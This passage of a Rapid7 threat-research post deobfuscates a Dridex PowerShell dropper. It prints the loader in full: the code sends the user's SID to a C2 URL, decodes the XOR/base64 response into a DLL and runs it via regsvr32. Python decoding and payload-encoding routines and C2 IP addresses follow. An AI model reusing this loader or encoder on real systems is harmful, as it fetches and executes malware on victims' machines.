'repl','a','ce').Invoke(${lx`DXcij`U`iA`sWE},'\d',''))"""
print(string.replace("`",""))

Output:

{SdfjIEUYID}=("{0}{1}"-f'm/d','ot');${LXDXCijuIAswe}=([System.Security.Principal.WindowsIdentity]::("{0}{2}{3}{1}" -f 'G','ent','e','tCurr').Invoke())."UsEr"."VALuE";${sfjHeIY6E}=("{0}{1}{2}{3}" -f 'h','ttps://t','ure','n')+${sdfjiEUyid}.("{0}{1}" -f 'spl','it').Invoke('/')[1]+'.co'+${sdfJIEUYId}+'?'+${LxDxCIJUiaswe};&('Si') ("{0}{2}{1}" -f'Var','f','iable:/') ${sFJHeiY6E};&('Sv') 1 ("{3}{0}{1}{2}" -f 'ie','n','t','Net.WebCl');&('SI') ("{2}{1}{0}" -f':C2','able','Vari') (.('Ne'+'w-'+'Obje'+'ct') (&('Gv') 1 -Va));.('SV') ('c') ("{1}{0}{2}" -f 'loa','Down','dData');${yuUH}=(([Char[]](&('Varia'+'b'+'le') ('C2') -ValueOn).((&('Var'+'iab'+'le') ('c') -Val))."inVoKE"((.('Va'+'ria'+'ble') ('f'))."vAluE"))-Join'');${xcChi}=${Env:TemP};${kiIUjjk}=(${D}=.('g'+'ci') ${XCcHI}|&('ge'+'t-r'+'andom'))."NamE" -replace ".{4}$";${XiiXI}=${xcChI}+'\'+${KIiuJJk}+'.';${mURrU}=${YUuH}.("{0}{1}" -f 'sub','string').Invoke(0,1);${p}=[int]${MURrU}*100;${ccNUm} =${YUUH}.("{0}{1}{2}" -f 'r','e','move').Invoke(0,1);${DKjKifxo}=${CcNUM} -split'!';.('s'+'al') ("{1}{0}"-f'ms','Dru') ("{1}{2}{0}"-f 'r32','re','gsv');${EQDRUmS}=[Text.Encoding]::"uTf8";function exiTtT(${aBc}){${WWUFDEFKDJhNkX}=[Convert]::("{1}{3}{2}{0}"-f'ng','FromBa','i','se64Str').Invoke(${aBC});return ${WWUFDefKdJhNkx}};foreach(${FffJDFJIiOUFIdHjFD} in ${DkjkiFXO}[0]){${tkcJkXNkzxmDs}=@();${HHkDjSKFJIkSsR}=${MURRu}.("{0}{2}{1}{3}"-f 'ToCh','Arr','ar','ay').Invoke();${FFFjdFjIIOuFIdhjfD}=.('Exi'+'tTT')(${FFFJdFJiIOuFiDhJFd});for(${kIJgJG}=0; ${kIJGJg} -lt ${FfFjdfJIiOUFIdhjFD}."CoUNt"; ${KIjgjG}++){${TKcJKXnKZXmdS} += [char]([Byte]${FFfjDFjIIOUFIdhJfD}[${KijGjG}] -bxor[Byte]${hhKdJskFjiKsSr}[${KIJgJG}%${HHKDjskfjIKSsr}."Count"])}};${qKdiUJsDIhFs}=${cCNum}."REPlAcE"((${DkjKiFxO}[0]+"!"),${EqdRUmS}."gEtSTRINg"(${tKcjKxnkZxMDs}));[io.file]::("{1}{2}{3}{0}"-f'es','Wri','teA','llByt').Invoke(${xiiXi},(.('Exi'+'tTT')(${QKdIUJSDIHFs} -replace ".{200}$")));if((.('g'+'ci') ${xiixi})."lENGTh" -lt ${P}){exit};.('sle'+'ep') 10;&('Dru'+'ms') ('/s') ${xiiXI};.('slee'+'p') 15;[io.file]::"WrIteALLlIneS"(${XIixI},[regex]::("{0}{1}{2}"-f 'repl','a','ce').Invoke(${lxDXcijUiAsWE},'\d',''))

You might recognize the same type of PowerShell format string obfuscation we dealt with above.

We can reuse some of our code!

import re
import sys
def powershell_format_string_replacement(s):
	array_index = []
	array_output = []
	deob = []
	pattern = r"""(?:\\\"|\")(?:\{\d+\})+(?:\\\"|\")\s*-f\s*(?:'[^']+',)+(?:'[^']+')"""
	while re.findall(pattern,s):
		r = re.findall(pattern,s)[0]
		try:
			array_index = []
			array_output = []
			deob = []
			r = r.split("-f")
			x = r[0].split("}{")
			y = r[1].split("','")
			y[0] = y[0].lstrip()
			for i in x:
				array_index.append(re.sub('[^0-9]','',i))
			for i in y:
				array_output.append(i.strip("'"))
			i = 0
			while i < len(array_index):
				deob.append(array_output[int(array_index[i])])
				i += 1
			s = re.sub(pattern,''.join(deob),s,1)
		except Exception as e:
			print( e)
			sys.exit()
	return (s)

string = r"""{SdfjIEUYID}=("{0}{1}"-f'm/d','ot');${LXDXCijuIAswe}=([System.Security.Principal.WindowsIdentity]::("{0}{2}{3}{1}" -f 'G','ent','e','tCurr').Invoke())."UsEr"."VALuE";${sfjHeIY6E}=("{0}{1}{2}{3}" -f 'h','ttps://t','ure','n')+${sdfjiEUyid}.("{0}{1}" -f 'spl','it').Invoke('/')[1]+'.co'+${sdfJIEUYId}+'?'+${LxDxCIJUiaswe};&('Si') ("{0}{2}{1}" -f'Var','f','iable:/') ${sFJHeiY6E};&('Sv') 1 ("{3}{0}{1}{2}" -f 'ie','n','t','Net.WebCl');&('SI') ("{2}{1}{0}" -f':C2','able','Vari') (.('Ne'+'w-'+'Obje'+'ct') (&('Gv') 1 -Va));.('SV') ('c') ("{1}{0}{2}" -f 'loa','Down','dData');${yuUH}=(([Char[]](&('Varia'+'b'+'le') ('C2') -ValueOn).((&('Var'+'iab'+'le') ('c') -Val))."inVoKE"((.('Va'+'ria'+'ble') ('f'))."vAluE"))-Join'');${xcChi}=${Env:TemP};${kiIUjjk}=(${D}=.('g'+'ci') ${XCcHI}|&('ge'+'t-r'+'andom'))."NamE" -replace ".{4}$";${XiiXI}=${xcChI}+'\'+${KIiuJJk}+'.';${mURrU}=${YUuH}.("{0}{1}" -f 'sub','string').Invoke(0,1);${p}=[int]${MURrU}*100;${ccNUm} =${YUUH}.("{0}{1}{2}" -f 'r','e','move').Invoke(0,1);${DKjKifxo}=${CcNUM} -split'!';.('s'+'al') ("{1}{0}"-f'ms','Dru') ("{1}{2}{0}"-f 'r32','re','gsv');${EQDRUmS}=[Text.Encoding]::"uTf8";function exiTtT(${aBc}){${WWUFDEFKDJhNkX}=[Convert]::("{1}{3}{2}{0}"-f'ng','FromBa','i','se64Str').Invoke(${aBC});return ${WWUFDefKdJhNkx}};foreach(${FffJDFJIiOUFIdHjFD} in ${DkjkiFXO}[0]){${tkcJkXNkzxmDs}=@();${HHkDjSKFJIkSsR}=${MURRu}.("{0}{2}{1}{3}"-f 'ToCh','Arr','ar','ay').Invoke();${FFFjdFjIIOuFIdhjfD}=.('Exi'+'tTT')(${FFFJdFJiIOuFiDhJFd});for(${kIJgJG}=0; ${kIJGJg} -lt ${FfFjdfJIiOUFIdhjFD}."CoUNt"; ${KIjgjG}++){${TKcJKXnKZXmdS} += [char]([Byte]${FFfjDFjIIOUFIdhJfD}[${KijGjG}] -bxor[Byte]${hhKdJskFjiKsSr}[${KIJgJG}%${HHKDjskfjIKSsr}."Count"])}};${qKdiUJsDIhFs}=${cCNum}."REPlAcE"((${DkjKiFxO}[0]+"!"),${EqdRUmS}."gEtSTRINg"(${tKcjKxnkZxMDs}));[io.file]::("{1}{2}{3}{0}"-f'es','Wri','teA','llByt').Invoke(${xiiXi},(.('Exi'+'tTT')(${QKdIUJSDIHFs} -replace ".{200}$")));if((.('g'+'ci') ${xiixi})."lENGTh" -lt ${P}){exit};.('sle'+'ep') 10;&('Dru'+'ms') ('/s') ${xiiXI};.('slee'+'p') 15;[io.file]::"WrIteALLlIneS"(${XIixI},[regex]::("{0}{1}{2}"-f 'repl','a','ce').Invoke(${lxDXcijUiAsWE},'\d',''))"""
print(powershell_format_string_replacement(string))

Output:

{SdfjIEUYID}=(m/dot);${LXDXCijuIAswe}=([System.Security.Principal.WindowsIdentity]::(GetCurrent).Invoke())."UsEr"."VALuE";${sfjHeIY6E}=(https://turen)+${sdfjiEUyid}.(split).Invoke('/')[1]+'.co'+${sdfJIEUYId}+'?'+${LxDxCIJUiaswe};&('Si') (Variable:/f) ${sFJHeiY6E};&('Sv') 1 (Net.WebClient);&('SI') (Variable:C2) (.('Ne'+'w-'+'Obje'+'ct') (&('Gv') 1 -Va));.('SV') ('c') (DownloadData);${yuUH}=(([Char[]](&('Varia'+'b'+'le') ('C2') -ValueOn).((&('Var'+'iab'+'le') ('c') -Val))."inVoKE"((.('Va'+'ria'+'ble') ('f'))."vAluE"))-Join'');${xcChi}=${Env:TemP};${kiIUjjk}=(${D}=.('g'+'ci') ${XCcHI}|&('ge'+'t-r'+'andom'))."NamE" -replace ".{4}$";${XiiXI}=${xcChI}+'\'+${KIiuJJk}+'.';${mURrU}=${YUuH}.(substring).Invoke(0,1);${p}=[int]${MURrU}*100;${ccNUm} =${YUUH}.(remove).Invoke(0,1);${DKjKifxo}=${CcNUM} -split'!';.('s'+'al') (Drums) (regsvr32);${EQDRUmS}=[Text.Encoding]::"uTf8";function exiTtT(${aBc}){${WWUFDEFKDJhNkX}=[Convert]::(FromBase64String).Invoke(${aBC});return ${WWUFDefKdJhNkx}};foreach(${FffJDFJIiOUFIdHjFD} in ${DkjkiFXO}[0]){${tkcJkXNkzxmDs}=@();${HHkDjSKFJIkSsR}=${MURRu}.(ToCharArray).Invoke();${FFFjdFjIIOuFIdhjfD}=.('Exi'+'tTT')(${FFFJdFJiIOuFiDhJFd});for(${kIJgJG}=0; ${kIJGJg} -lt ${FfFjdfJIiOUFIdhjFD}."CoUNt"; ${KIjgjG}++){${TKcJKXnKZXmdS} += [char]([Byte]${FFfjDFjIIOUFIdhJfD}[${KijGjG}] -bxor[Byte]${hhKdJskFjiKsSr}[${KIJgJG}%${HHKDjskfjIKSsr}."Count"])}};${qKdiUJsDIhFs}=${cCNum}."REPlAcE"((${DkjKiFxO}[0]+"!"),${EqdRUmS}."gEtSTRINg"(${tKcjKxnkZxMDs}));[io.file]::(WriteAllBytes).Invoke(${xiiXi},(.('Exi'+'tTT')(${QKdIUJSDIHFs} -replace ".{200}$")));if((.('g'+'ci') ${xiixi})."lENGTh" -lt ${P}){exit};.('sle'+'ep') 10;&('Dru'+'ms') ('/s') ${xiiXI};.('slee'+'p') 15;[io.file]::"WrIteALLlIneS"(${XIixI},[regex]::(replace).Invoke(${lxDXcijUiAsWE},'\d',''))

Let's remove the pesky "'+'"'s again.

string = r"""{SdfjIEUYID}=(m/dot);${LXDXCijuIAswe}=([System.Security.Principal.WindowsIdentity]::(GetCurrent).Invoke())."UsEr"."VALuE";${sfjHeIY6E}=(https://turen)+${sdfjiEUyid}.(split).Invoke('/')[1]+'.co'+${sdfJIEUYId}+'?'+${LxDxCIJUiaswe};&('Si') (Variable:/f) ${sFJHeiY6E};&('Sv') 1 (Net.WebClient);&('SI') (Variable:C2) (.('Ne'+'w-'+'Obje'+'ct') (&('Gv') 1 -Va));.('SV') ('c') (DownloadData);${yuUH}=(([Char[]](&('Varia'+'b'+'le') ('C2') -ValueOn).((&('Var'+'iab'+'le') ('c') -Val))."inVoKE"((.('Va'+'ria'+'ble') ('f'))."vAluE"))-Join'');${xcChi}=${Env:TemP};${kiIUjjk}=(${D}=.('g'+'ci') ${XCcHI}|&('ge'+'t-r'+'andom'))."NamE" -replace ".{4}$";${XiiXI}=${xcChI}+'\'+${KIiuJJk}+'.';${mURrU}=${YUuH}.(substring).Invoke(0,1);${p}=[int]${MURrU}*100;${ccNUm} =${YUUH}.(remove).Invoke(0,1);${DKjKifxo}=${CcNUM} -split'!';.('s'+'al') (Drums) (regsvr32);${EQDRUmS}=[Text.Encoding]::"uTf8";function exiTtT(${aBc}){${WWUFDEFKDJhNkX}=[Convert]::(FromBase64String).Invoke(${aBC});return ${WWUFDefKdJhNkx}};foreach(${FffJDFJIiOUFIdHjFD} in ${DkjkiFXO}[0]){${tkcJkXNkzxmDs}=@();${HHkDjSKFJIkSsR}=${MURRu}.(ToCharArray).Invoke();${FFFjdFjIIOuFIdhjfD}=.('Exi'+'tTT')(${FFFJdFJiIOuFiDhJFd});for(${kIJgJG}=0; ${kIJGJg} -lt ${FfFjdfJIiOUFIdhjFD}."CoUNt"; ${KIjgjG}++){${TKcJKXnKZXmdS} += [char]([Byte]${FFfjDFjIIOUFIdhJfD}[${KijGjG}] -bxor[Byte]${hhKdJskFjiKsSr}[${KIJgJG}%${HHKDjskfjIKSsr}."Count"])}};${qKdiUJsDIhFs}=${cCNum}."REPlAcE"((${DkjKiFxO}[0]+"!"),${EqdRUmS}."gEtSTRINg"(${tKcjKxnkZxMDs}));[io.file]::(WriteAllBytes).Invoke(${xiiXi},(.('Exi'+'tTT')(${QKdIUJSDIHFs} -replace ".{200}$")));if((.('g'+'ci') ${xiixi})."lENGTh" -lt ${P}){exit};.('sle'+'ep') 10;&('Dru'+'ms') ('/s') ${xiiXI};.('slee'+'p') 15;[io.file]::"WrIteALLlIneS"(${XIixI},[regex]::(replace).Invoke(${lxDXcijUiAsWE},'\d',''))"""
print(string.replace("'+'",""))

Output:

{SdfjIEUYID}=(m/dot);${LXDXCijuIAswe}=([System.Security.Principal.WindowsIdentity]::(GetCurrent).Invoke())."UsEr"."VALuE";${sfjHeIY6E}=(https://turen)+${sdfjiEUyid}.(split).Invoke('/')[1]+'.co'+${sdfJIEUYId}+'?'+${LxDxCIJUiaswe};&('Si') (Variable:/f) ${sFJHeiY6E};&('Sv') 1 (Net.WebClient);&('SI') (Variable:C2) (.('New-Object') (&('Gv') 1 -Va));.('SV') ('c') (DownloadData);${yuUH}=(([Char[]](&('Variable') ('C2') -ValueOn).((&('Variable') ('c') -Val))."inVoKE"((.('Variable') ('f'))."vAluE"))-Join'');${xcChi}=${Env:TemP};${kiIUjjk}=(${D}=.('gci') ${XCcHI}|&('get-random'))."NamE" -replace ".{4}$";${XiiXI}=${xcChI}+'\'+${KIiuJJk}+'.';${mURrU}=${YUuH}.(substring).Invoke(0,1);${p}=[int]${MURrU}*100;${ccNUm} =${YUUH}.(remove).Invoke(0,1);${DKjKifxo}=${CcNUM} -split'!';.('sal') (Drums) (regsvr32);${EQDRUmS}=[Text.Encoding]::"uTf8";function exiTtT(${aBc}){${WWUFDEFKDJhNkX}=[Convert]::(FromBase64String).Invoke(${aBC});return ${WWUFDefKdJhNkx}};foreach(${FffJDFJIiOUFIdHjFD} in ${DkjkiFXO}[0]){${tkcJkXNkzxmDs}=@();${HHkDjSKFJIkSsR}=${MURRu}.(ToCharArray).Invoke();${FFFjdFjIIOuFIdhjfD}=.('ExitTT')(${FFFJdFJiIOuFiDhJFd});for(${kIJgJG}=0; ${kIJGJg} -lt ${FfFjdfJIiOUFIdhjFD}."CoUNt"; ${KIjgjG}++){${TKcJKXnKZXmdS} += [char]([Byte]${FFfjDFjIIOUFIdhJfD}[${KijGjG}] -bxor[Byte]${hhKdJskFjiKsSr}[${KIJgJG}%${HHKDjskfjIKSsr}."Count"])}};${qKdiUJsDIhFs}=${cCNum}."REPlAcE"((${DkjKiFxO}[0]+"!"),${EqdRUmS}."gEtSTRINg"(${tKcjKxnkZxMDs}));[io.file]::(WriteAllBytes).Invoke(${xiiXi},(.('ExitTT')(${QKdIUJSDIHFs} -replace ".{200}$")));if((.('gci') ${xiixi})."lENGTh" -lt ${P}){exit};.('sleep') 10;&('Drums') ('/s') ${xiiXI};.('sleep') 15;[io.file]::"WrIteALLlIneS"(${XIixI},[regex]::(replace).Invoke(${lxDXcijUiAsWE},'\d',''))

Finally, we can append semicolons with newlines and format the code appropriately.

{SdfjIEUYID}=(m/dot);
${LXDXCijuIAswe}=([System.Security.Principal.WindowsIdentity]::(GetCurrent).Invoke())."UsEr"."VALuE";
${sfjHeIY6E}=(https://turen)+${sdfjiEUyid}.(split).Invoke('/')[1]+'.co'+${sdfJIEUYId}+'?'+${LxDxCIJUiaswe};
&('Si') (Variable:/f) ${sFJHeiY6E};
&('Sv') 1 (Net.WebClient);
&('SI') (Variable:C2) (.('New-Object') (&('Gv') 1 -Va));
.('SV') ('c') (DownloadData);
${yuUH}=(([Char[]](&('Variable') ('C2') -ValueOn).((&('Variable') ('c') -Val))."inVoKE"((.('Variable') ('f'))."vAluE"))-Join'');
${xcChi}=${Env:TemP};
${kiIUjjk}=(${D}=.('gci') ${XCcHI}|&('get-random'))."NamE" -replace ".{4}$";
${XiiXI}=${xcChI}+'\'+${KIiuJJk}+'.';
${mURrU}=${YUuH}.(substring).Invoke(0,1);
${p}=[int]${MURrU}*100;
${ccNUm} =${YUUH}.(remove).Invoke(0,1);
${DKjKifxo}=${CcNUM} -split'!';
.('sal') (Drums) (regsvr32);
${EQDRUmS}=[Text.Encoding]::"uTf8";
function exiTtT(${aBc}){
	${WWUFDEFKDJhNkX}=[Convert]::(FromBase64String).Invoke(${aBC});
	return ${WWUFDefKdJhNkx}
};

foreach(${FffJDFJIiOUFIdHjFD} in ${DkjkiFXO}[0]){
	${tkcJkXNkzxmDs}=@();
	${HHkDjSKFJIkSsR}=${MURRu}.(ToCharArray).Invoke();
	${FFFjdFjIIOuFIdhjfD}=.('ExitTT')(${FFFJdFJiIOuFiDhJFd});
	for(${kIJgJG}=0; ${kIJGJg} -lt ${FfFjdfJIiOUFIdhjFD}."CoUNt"; ${KIjgjG}++){
		${TKcJKXnKZXmdS} += [char]([Byte]${FFfjDFjIIOUFIdhJfD}[${KijGjG}] -bxor[Byte]${hhKdJskFjiKsSr}[${KIJgJG}%${HHKDjskfjIKSsr}."Count"])
	}
};
${qKdiUJsDIhFs}=${cCNum}."REPlAcE"((${DkjKiFxO}[0]+"!"),${EqdRUmS}."gEtSTRINg"(${tKcjKxnkZxMDs}));
[io.file]::(WriteAllBytes).Invoke(${xiiXi},(.('ExitTT')(${QKdIUJSDIHFs} -replace ".{200}$")));
if((.('gci') ${xiixi})."lENGTh" -lt ${P}){
	exit
};
.('sleep') 10;
&('Drums') ('/s') ${xiiXI};
.('sleep') 15;
[io.file]::"WrIteALLlIneS"(${XIixI},[regex]::(replace).Invoke(${lxDXcijUiAsWE},'\d',''))

Now, we are getting to the core of the payload.

We can see calls to [System.Security.Principal.WindowsIdentity]::(GetCurrent).Invoke())."User"."Value";
which returns the SID of the current user. The SID is later used in the request (New-Object Net.WebClient).DownloadData("https://turendot[.]com/dot?(SID)"), which is created from concatenating values that were obfuscated with Set-Item and Set-Value aliases.

The payload splits the C2 response into two objects split on the ! character. It then saves the first character from the response as a UTF-8-encoded XOR key before removing that same character from the first object. The payload then performs a base64-decode on the first object in the split response, and then performs a standard XOR operation upon the base64-decoded object.

After the XOR operation, the payload performs another base64-decode on the base64-decoded XORed object from the first object in the split response. It then concatenates all of that with the base64-decoded data from the second object in the split response with the last 200 characters removed.

This decoded and concatenated payload is then executed with regsvr32 /s <PAYLOAD>.

Rapid7 acquired two responses from the C2. The responses were similar in nature to the following examples, but have been modified to reduce visibility into Rapid7’s analysis environment:

C2 Response A
C2 Response B

We can decode the responses by emulating what the PowerShell would have done with the following script:

response_string = "put c2 response here"
def decode_c2_response(response_string):
        #Get the XOR key from the first character
        xor_key = bytearray(response_string[0],'utf8')

        #Split the response on the "!"
        response_array = response_string.split("!")

        #Remove the first character from the first part.
        part_one = response_array[0][1:]

        #Base64 decode the first part.
        part_one_decoded = base64.b64decode(part_one)

        #XOR the first part with the removed first character.
        xored_part_one = bytearray(ord(c)^k for c,k in izip(part_one_decoded, cycle(xor_key)))

        #Base64 decode again
        decoded_part_one = base64.b64decode(xored_part_one)

        #Write to file
        payload = open("decoded_response.bin", "wb")
        payload.write(decoded_part_one)

        #Remove 200 characters from the end of the second part.
        part_two = response_array[1][:-200]

        #Base64 decode
        part_two_decoded = base64.b64decode(part_two)

        #Write to file
        payload.write(part_two_decoded)

decode_c2_response(response_string)

Decoded Payload From C2 Response A:
MD5: D498893DB1DAC590D053860C9F88A2E8
SHA-1: 77C5F40CBAA32E5B1225485104575424815D26AF
OriginalFileName: nearsummer.dll

Decoded Payload From C2 Response B:
MD5: 127C2EB0D907B969092749EA91CD2E81
SHA-1: F371EFF5DA6A58DF9A232CF0DD88F4EBA48726F2
OriginalFileName: nearsummer.dll

Rapid7 analyzed publicly available samples using VirusTotal's vhash fuzzy hashing search, and identified many samples that were similar to the decoded payload.

After further inspection using binary diffing, Rapid7 determined that the analyzed samples differed only by four bytes. This extreme similarity provides insight into how the C2 server might function, though this is only speculation driven purely by static analysis. Below is sample code for the generation of a payload that the analyzed malicious document could successfully execute:

def encode_dridex(payload_filename):
        #modify payload to alter hash values
        payload = open(payload_filename, "r+b")
        payload.seek(0x19857)
        payload.write(bytearray([randrange(16),randrange(16),randrange(16),randrange(16),randrange(16),randrange(16),randrange(16),randrange(16)]))
        payload.seek(0)

        #create an xor key. utf8 can be up to 4 bytes though the response keys were ascii, so we'll use those.
        xor_key = randrange(127)
        while chr(xor_key) not in string.printable:
                xor_key = randrange(127)
        xor_key = str(chr(xor_key))
        
        #split the file
        length = os.path.getsize(payload_filename)
        random_offset = randrange(length)
        payload_part_one = base64.b64encode(payload.read(random_offset))
        payload_part_two = base64.b64encode(payload.read())

        xor_payload_one = bytearray(ord(c)^k for c,k in izip(payload_part_one, cycle(bytearray(xor_key,'utf8'))))

        base64_encoded_xor_part_one = base64.b64encode(xor_payload_one)

        return str(xor_key + base64_encoded_xor_part_one + "!" + payload_part_two + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(200)))

Now that we have samples to work with and have acquired context, while also limiting interaction with malicious infrastructure, we can begin basic dynamic analysis.

After detonating the decoded payloads with regsvr32, we were able to identify a sleep function which prints debug strings. This is likely used as an anti-analysis technique since it wastes analyst’s time. We were also able to identify network connection attempts using function InternetConnectW with the following ServerName:ServerPort arguments:

5.45.179.186:443
91.103.2.132:4543
89.107.129.122:4143
46.101.214.173:3886

The behavioral characteristics, in conjunction with open-source intelligence that ties identified IP addresses to known infrastructure, indicates that these samples are associated with the Dridex family of malware.

C2 operators have the capability to limit researchers, defenders, and sandboxes from interacting with malicious infrastructure. C2 operators are able to block or limit access by IP address, allow or disallow by user agent, allow only unique payloads to limit analysis, and many other techniques to identify unwanted interaction with their infrastructure.

It is useful to employ static analysis to limit unnecessary interaction with malicious infrastructure, and inhibit malicious actors from detecting, fingerprinting, and restricting access. When facing unknown threats, or the aforementioned obfuscation techniques, it is beneficial to have a team of around-the-clock experts monitoring and defending against threats to stop malicious actors in their tracks.

Learn more about our Managed Detection and Response (MDR) Services